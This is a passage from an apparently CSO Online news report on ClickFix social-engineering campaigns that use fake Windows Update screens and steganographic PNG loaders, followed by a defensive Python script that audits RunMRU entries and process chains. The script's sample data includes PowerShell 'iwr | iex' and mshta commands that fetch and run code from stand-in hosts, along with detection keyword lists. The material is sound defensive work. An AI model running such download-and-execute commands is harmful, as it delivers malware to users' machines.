Run dialog box, Windows Terminal, or Windows PowerShell. This leads to the downloading of scripts that launch malware.

Two new tactics are used in the latest ClickFix campaign, says Huntress:

One is the use, since early October, of a fake blue Windows Update splash page shown full-screen. It displays realistic “Working on updates” animations that eventually conclude by prompting the user to follow the standard ClickFix pattern: open the Run prompt (Win+R), then paste and run the malicious command.

Why would an employee do this? Because the request is part of an alleged test to prove the victim is human. A screen saying “Human Verification. Follow 3 quick steps to verify you’re not a robot.” is displayed. It looks like a CAPTCHA request, which is familiar to employees these days. In this case, the three steps are: press the Windows key + R (which opens the Run box); press CTRL + V (which pastes in a command that was automatically copied to the clipboard); and then press Enter to “verify” (which actually runs the command that triggers the download of scripts).

The other is steganography, which conceals the final malware stages within an image. Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory.

In an email, report co-author Ana Pham said steganography is not new to malware operations. “What stands out here is the implementation: rather than simply appending malicious data to an image file, this campaign encodes the payload directly into the RGB pixel values of PNG images, extracting shellcode by reading specific color channels and applying XOR decryption. It’s a more involved approach than basic file-appending techniques, designed to evade signature-based detection.”

The Windows Update-themed tactic is particularly effective because it mimics something users expect to see: a full-screen Windows Update splash page with realistic animations, she said. “Given how convincing this lure is compared to standard ‘robot verification’ pages, it’s reasonable to expect other threat actors will adopt similar approaches,” she added.
“The source code for these lures contains Russian-language comments and isn’t heavily obfuscated, meaning it could be shared or copied by other groups relatively easily.”
Attacks are now ‘rampant’:

ClickFix has become rampant among Huntress’ customers, she said, and is one of the most prevalent threats seen this year. In the past six months, the company has seen a 313% increase in ClickFix-related incidents.

Huntress responded to 76 separate incidents tied to this specific campaign over a one-month period from late September through October, with attacks targeting organizations across multiple regions, including the United States, Europe/Middle East/Africa, and Asia-Pacific.

What ties the incidents together is a specific indicator, Pham said: the initial payload, which ultimately delivers the steganographic loader, always contains a URL where the second octet is encoded in hexadecimal format.

Researchers at Palo Alto Networks’ Unit 42 threat intelligence division have also reported seeing more ClickFix attacks. In a July report, they said attackers lure victims into copying and pasting commands to apply quick fixes to common computer issues such as performance problems, missing drivers, or pop-up errors. Fake tech support forums are one way these attacks start. Threat actors have also been known, in other campaigns, to use fake DocuSign and Okta single sign-on pages to trick users. Payloads include infostealers, remote access trojans (RATs), or tools that disable security.

“This delivery method bypasses many standard detection and prevention controls,” says the Palo Alto report. “There is no exploit, phishing attachment, or malicious link. Instead, potential victims unknowingly run the command themselves, through a trusted system shell. This method makes infections from ClickFix more complicated to detect than drive-by downloads or traditional malware droppers.”

In yet another instance, researchers at NCC Group today issued this report on a ClickFix attack they discovered in May that involved a drive-by compromise and the use of a fake CAPTCHA popup, with the goal of installing the Lumma C2 Stealer.
What CSOs should do:

But CSOs aren’t without defenses. One is disabling the Windows Run dialog through registry modifications or Group Policy. As well, they should audit the RunMRU registry key (which keeps a copy of the most recently executed commands from the Run window) during investigations to check whether users have executed suspicious commands through the Run dialog. Palo Alto Networks notes that key indicators of suspicious RunMRU contents include obfuscated content, keywords related to the download and execution of payloads from unknown or suspicious domains, and keywords indicating calls to administrative interfaces.

Pham also said leaders should deploy endpoint monitoring for suspicious process chains, particularly watching for explorer.exe spawning mshta.exe, or PowerShell with unusual command-line arguments.

Palo Alto Networks also warned that some attackers aim to avoid leaving traces in the RunMRU registry key by instructing victims to launch a terminal for PowerShell (Windows 11) or Command Prompt (Windows 10) rather than the Run box. EDR telemetry or Windows Event Logs will show signs of this tactic.

While security awareness training is important, it shouldn’t be the only line of defense, said Pham. “ClickFix succeeds because it exploits user trust and habitual behavior,” she said. “Users instinctively trust CAPTCHA checks and Windows update screens as routine parts of their day. Even well-trained users can be caught off guard by a convincing full-screen Windows Update animation. The most effective [mitigation] approach combines user education with technical controls: disabling the Run dialog, monitoring for suspicious process behavior, and maintaining robust endpoint detection. Defense in depth matters here: training reduces the likelihood someone falls for the lure, but technical controls provide a safety net when they do.”

At this time Huntress doesn’t have enough evidence to determine whether this specific campaign was run by a particular threat actor or multiple groups of threat actors, Pham noted.
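The audit and monitoring steps above, as an added example that is neither Huntress’ nor Unit 42’s code: a Python triage script that parses a RunMRU registry export, scores each command against the three indicator classes named in the text (obfuscation, download-and-execute keywords, calls to administrative interfaces), decodes any PowerShell -EncodedCommand argument for the analyst, and flags explorer.exe spawning mshta.exe or PowerShell with indicator-matching arguments over constructed process-creation events. The .reg text, the encoded command, the documentation-range IPs and the keyword lists are all constructed assumptions of this example, not a published signature set.

```python
"""Host-side ClickFix triage: audit a RunMRU export and flag suspicious process chains.

Added example, not Huntress or Unit 42 tooling. The .reg text, encoded command and
process events are constructed samples (documentation-range IPs); the keyword patterns
are my own reading of the three indicator classes the text names, not a published set.
"""
import base64
import re

# Live input: reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" out.reg
# (UTF-16; read with encoding="utf-16"). RunMRU keeps one string value per command,
# named "a", "b", ..., each ending in a literal "\1"; "MRUList" orders them newest first.
ENCODED_SAMPLE = base64.b64encode("Get-Date".encode("utf-16le")).decode()  # harmless, constructed
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="edcba"
"a"="notepad\\1"
"b"="\\\\fileserver\\share\\1"
"c"="powershell -w hidden -ep bypass -c \"iwr http://198.51.100.7/chk.txt | iex\"\\1"
"d"="mshta http://203.0.113.5/verify.hta\\1"
''' + f'"e"="powershell -enc {ENCODED_SAMPLE}\\\\1"\n'

VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = {
    "obfuscation": re.compile(ENC_RE.pattern + r"|\^|`|[A-Za-z0-9+/]{60,}={0,2}", re.I),
    "download/execute": re.compile(
        r"\b(?:iwr|iex|invoke-webrequest|invoke-expression|downloadstring|downloadfile"
        r"|curl|certutil|bitsadmin|mshta)\b|https?://", re.I),
    "admin interface": re.compile(
        r"\b(?:wmic|invoke-wmimethod|get-wmiobject|invoke-cimmethod|schtasks|sc\.exe"
        r"|reg\.exe|rundll32|regsvr32)\b", re.I),
}

def parse_runmru(reg_text: str) -> list:
    """(value name, command) pairs, newest first, .reg escapes undone and trailing \\1 removed."""
    values = {}
    for line in reg_text.splitlines():
        m = VALUE_RE.match(line.strip())
        if m:  # one pass undoes both the backslash and the double-quote escapes
            values[m.group(1)] = re.sub(r"\\(.)", r"\1", m.group(2))
    ordered = []
    for name in values.pop("MRUList", ""):
        cmd = values.get(name)
        if cmd is not None:
            ordered.append((name, cmd[:-2] if cmd.endswith("\\1") else cmd))
    return ordered

def classify_command(cmd: str) -> list:
    """Indicator classes matched by a command line (empty list = nothing odd)."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def decode_encoded_command(cmd: str):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = ENC_RE.search(cmd)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def audit_runmru(reg_text: str) -> list:
    """RunMRU commands tripping at least one indicator, with any encoded command decoded."""
    return [{"value": n, "command": c, "indicators": classify_command(c),
             "decoded": decode_encoded_command(c)}
            for n, c in parse_runmru(reg_text) if classify_command(c)]

# Constructed process-creation events: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "notepad.exe", "notepad.exe"),
    ("explorer.exe", "mshta.exe", "mshta http://203.0.113.5/verify.hta"),
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -ep bypass -c "iwr http://198.51.100.7/chk.txt | iex"'),
    ("cmd.exe", "powershell.exe", "powershell -File C:\\scripts\\backup.ps1"),
]

def suspicious_process_events(events) -> list:
    """Flag explorer.exe spawning mshta.exe, and PowerShell whose arguments trip an indicator."""
    flagged = []
    for parent, image, cmdline in events:
        reasons = []
        if parent.lower() == "explorer.exe" and image.lower() == "mshta.exe":
            reasons.append("explorer.exe spawned mshta.exe")
        if image.lower() in ("powershell.exe", "pwsh.exe"):
            reasons += [f"powershell arguments: {cls}" for cls in classify_command(cmdline)]
        if reasons:
            flagged.append((image, reasons))
    return flagged

if __name__ == "__main__":
    for f in audit_runmru(SAMPLE_REG):
        print(f"RunMRU {f['value']}: {f['indicators']} -> {f['command']!r} decoded={f['decoded']!r}")
    for image, reasons in suspicious_process_events(SAMPLE_EVENTS):
        print(f"process {image}: {'; '.join(reasons)}")
```

Two practical notes. The RunMRU check only sees what went through the Run box, which is exactly why the text pairs it with process telemetry: a victim told to open Windows Terminal or cmd.exe leaves nothing in RunMRU, but the same command lines still appear in process-creation events and can be scored with the same `classify_command`. And the “disable the Run dialog” control the text mentions corresponds to the Group Policy setting “Remove Run menu from Start Menu”, which writes the `NoRun` DWORD under `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`; auditing that value across the fleet is a cheap way to confirm the control is actually in place.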
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4096241/new-clickfix-attacks-use-fake-windows-update-screens-to-fool-employees.html